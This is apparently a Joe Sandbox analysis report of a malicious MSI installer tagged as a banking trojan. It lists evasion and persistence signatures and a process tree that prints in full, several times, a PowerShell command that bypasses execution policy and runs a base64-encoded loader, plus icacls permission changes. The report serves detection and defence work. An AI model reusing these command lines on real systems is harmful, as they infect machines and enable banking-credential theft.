Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cB1ItKbbhY.msi

Overview

General Information

Sample name:cB1ItKbbhY.msi
renamed because original name is a hash value
Original sample name:145a0149bc4d8a21d43bf013097c3d9d2a2db07c84fd52f80168ed898e22f5ae.msi
Analysis ID:1578854
MD5:41744d644791bdbbcff4b05a3e1e98e0
SHA1:9b7e8548591f1578309cefd2841e757b1656f00a
SHA256:145a0149bc4d8a21d43bf013097c3d9d2a2db07c84fd52f80168ed898e22f5ae
Tags:bankerlatammsiPAGAMENTOS-DIGITAIS-LTDAtrojanuser-johnk3r
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains very large strings
AI detected suspicious sample
Bypasses PowerShell execution policy
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Powershell drops PE file
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Switches to a custom stack to bypass stack traces
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • msiexec.exe (PID: 5696 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\cB1ItKbbhY.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 6496 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 3428 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E94365CFD725BFADC9A5695E48A7145F MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSI2EE6.tmp (PID: 3040 cmdline: "C:\Windows\Installer\MSI2EE6.tmp" /HideWindow "C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exe" "C:\Program Files (x86)\Dasmei support\App Dasmei installer\1e.ps1" MD5: D2F8C062ABA50CA096CBD5387A2D0B8B)
      • psexec.exe (PID: 4864 cmdline: "C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exe" "C:\Program Files (x86)\Dasmei support\App Dasmei installer\1e.ps1" MD5: 79AB86017B2C9B713D6AF08086B1937F)
        • powershell.exe (PID: 796 cmdline: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAzADEAOQAzADIANgBiADYALQBjADQANgBiAC0ANAA1ADAANwAtADgANABkADIALQA5ADgAMgAzADUAOQAzAGUAMgA1AGYANAAnADsAJAB5AD0AJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACAAKAB4ADgANgApAFwARABhAHMAbQBlAGkAIABzAHUAcABwAG8AcgB0AFwAQQBwAHAAIABEAGEAcwBtAGUAaQAgACAAaQBuAHMAdABhAGwAbABlAHIAXABwAHMAZQB4AGUAYwAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA== MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • icacls.exe (PID: 4184 cmdline: "C:\Windows\system32\icacls.exe" C:\Nvidia-59226 /grant Everyone:F /T /C MD5: 48C87E3B3003A2413D6399EA77707F5D)
          • WmiPrvSE.exe (PID: 6108 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • icacls.exe (PID: 7528 cmdline: "C:\Windows\system32\icacls.exe" C:\Nvidia-59226\Nvidia-59226.exe /grant Everyone:F /T /C MD5: 48C87E3B3003A2413D6399EA77707F5D)
          • Nvidia-59226.exe (PID: 7556 cmdline: "C:\Nvidia-59226\Nvidia-59226.exe" MD5: D11828146FF9E2E340C555F9531CAC47)
  • svchost.exe (PID: 6368 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Nvidia-59226.exe (PID: 7796 cmdline: "C:\Nvidia-59226\Nvidia-59226.exe" MD5: D11828146FF9E2E340C555F9531CAC47)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\Dasmei support\App Dasmei installer\.bkpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 796INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x68b90:$b2: ::FromBase64String(
    • 0x68c91:$b2: ::FromBase64String(
    • 0x68dbf:$b2: ::FromBase64String(
    • 0x68ee8:$b2: ::FromBase64String(
    • 0x69012:$b2: ::FromBase64String(
    • 0x69100:$b2: ::FromBase64String(
    • 0x6922f:$b2: ::FromBase64String(
    • 0x692c1:$b2: ::FromBase64String(
    • 0x693ea:$b2: ::FromBase64String(
    • 0x69561:$b2: ::FromBase64String(
    • 0x696d5:$b2: ::FromBase64String(
    • 0x69978:$b2: ::FromBase64String(
    • 0x69b73:$b2: ::FromBase64String(
    • 0x69d88:$b2: ::FromBase64String(
    • 0x69f58:$b2: ::FromBase64String(
    • 0x6a0ca:$b2: ::FromBase64String(
    • 0x6a1c2:$b2: ::FromBase64String(
    • 0x6a216:$b2: ::FromBase64String(
    • 0x6a427:$b2: ::FromBase64String(
    • 0x6a574:$b2: ::FromBase64String(
    • 0x6a8ab:$b2: ::FromBase64String(
    SourceRuleDescriptionAuthorStrings
    amsi64_796.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x322:$b2: ::FromBase64String(
    • 0x425:$b2: ::FromBase64String(
    • 0x554:$b2: ::FromBase64String(
    • 0x67e:$b2: ::FromBase64String(
    • 0x7a9:$b2: ::FromBase64String(
    • 0x898:$b2: ::FromBase64String(
    • 0x9cb:$b2: ::FromBase64String(
    • 0xa5e:$b2: ::FromBase64String(
    • 0xb89:$b2: ::FromBase64String(
    • 0xd01:$b2: ::FromBase64String(
    • 0xe76:$b2: ::FromBase64String(
    • 0x112b:$b2: ::FromBase64String(
    • 0x1336:$b2: ::FromBase64String(
    • 0x154e:$b2: ::FromBase64String(
    • 0x1723:$b2: ::FromBase64String(
    • 0x18a4:$b2: ::FromBase64String(
    • 0x199d:$b2: ::FromBase64String(
    • 0x19f1:$b2: ::FromBase64String(
    • 0x1c07:$b2: ::FromBase64String(
    • 0x1d62:$b2: ::FromBase64String(
    • 0x20a2:$b2: ::FromBase64String(

    System Summary

    barindex
    Source: File createdAuthor: Christopher Peacock '@securepeacock', SCYTHE: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 796, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nvidia-59226.lnk
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAzADEAOQAzADIANgBiADYALQBjADQANgBiAC0ANAA1ADAANwAtADgANABkADIALQA5ADgAMgAzADUAOQAzAGUAMgA1AGYANAAnADsAJAB5AD0AJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACAAKAB4ADgANgApAFwARABhAHMAbQBlAGkAIABzAHUAcABwAG8AcgB0AFwAQQBwAHAAIABEAGEAcwBtAGUAaQAgACAAaQBuAHMAdABhAGwAbABlAHIAXABwAHMAZQB4AGUAYwAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==, CommandLine: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAzADEAOQAzADIANgBiADYALQBjADQANgBiAC0ANAA1ADAANwAtADgANABkADIALQA5ADgAMgAzADUAOQAzAGUAMgA1AGYANAAnADsAJAB5AD0AJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACAAKAB4ADgANgApAFwARABhAHMAbQBlAGkAIABzAHUAcABwAG8AcgB0AFwAQQBwAHAAIABEAGEAcwBtAGUAaQAgACAAaQBuAHMAdABhAGwAbABlAHIAXABwAHMAZQB4AGUAYwAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQ
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAzADEAOQAzADIANgBiADYALQBjADQANgBiAC0ANAA1ADAANwAtADgANABkADIALQA5ADgAMgAzADUAOQAzAGUAMgA1AGYANAAnADsAJAB5AD0AJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACAAKAB4ADgANgApAFwARABhAHMAbQBlAGkAIABzAHUAcABwAG8AcgB0AFwAQQBwAHAAIABEAGEAcwBtAGUAaQAgACAAaQBuAHMAdABhAGwAbABlAHIAXABwAHMAZQB4AGUAYwAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==, CommandLine: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAzADEAOQAzADIANgBiADYALQBjADQANgBiAC0ANAA1ADAANwAtADgANABkADIALQA5ADgAMgAzADUAOQAzAGUAMgA1AGYANAAnADsAJAB5AD0AJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACAAKAB4ADgANgApAFwARABhAHMAbQBlAGkAIABzAHUAcABwAG8AcgB0AFwAQQBwAHAAIABEAGEAcwBtAGUAaQAgACAAaQBuAHMAdABhAGwAbABlAHIAXABwAHMAZQB4AGUAYwAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQ
    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAzADEAOQAzADIANgBiADYALQBjADQANgBiAC0ANAA1ADAANwAtADgANABkADIALQA5ADgAMgAzADUAOQAzAGUAMgA1AGYANAAnADsAJAB5AD0AJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACAAKAB4ADgANgApAFwARABhAHMAbQBlAGkAIABzAHUAcABwAG8AcgB0AFwAQQBwAHAAIABEAGEAcwBtAGUAaQAgACAAaQBuAHMAdABhAGwAbABlAHIAXABwAHMAZQB4AGUAYwAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==, CommandLine: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAzADEAOQAzADIANgBiADYALQBjADQANgBiAC0ANAA1ADAANwAtADgANABkADIALQA5ADgAMgAzADUAOQAzAGUAMgA1AGYANAAnADsAJAB5AD0AJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACAAKAB4ADgANgApAFwARABhAHMAbQBlAGkAIABzAHUAcABwAG8AcgB0AFwAQQBwAHAAIABEAGEAcwBtAGUAaQAgACAAaQBuAHMAdABhAGwAbABlAHIAXABwAHMAZQB4AGUAYwAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQ
    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 796, TargetFilename: C:\Nvidia-59226\play.exe
    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 796, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nvidia-59226.lnk
    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAzADEAOQAzADIANgBiADYALQBjADQANgBiAC0ANAA1ADAANwAtADgANABkADIALQA5ADgAMgAzADUAOQAzAGUAMgA1AGYANAAnADsAJAB5AD0AJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACAAKAB4ADgANgApAFwARABhAHMAbQBlAGkAIABzAHUAcABwAG8AcgB0AFwAQQBwAHAAIABEAGEAcwBtAGUAaQAgACAAaQBuAHMAdABhAGwAbABlAHIAXABwAHMAZQB4AGUAYwAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0A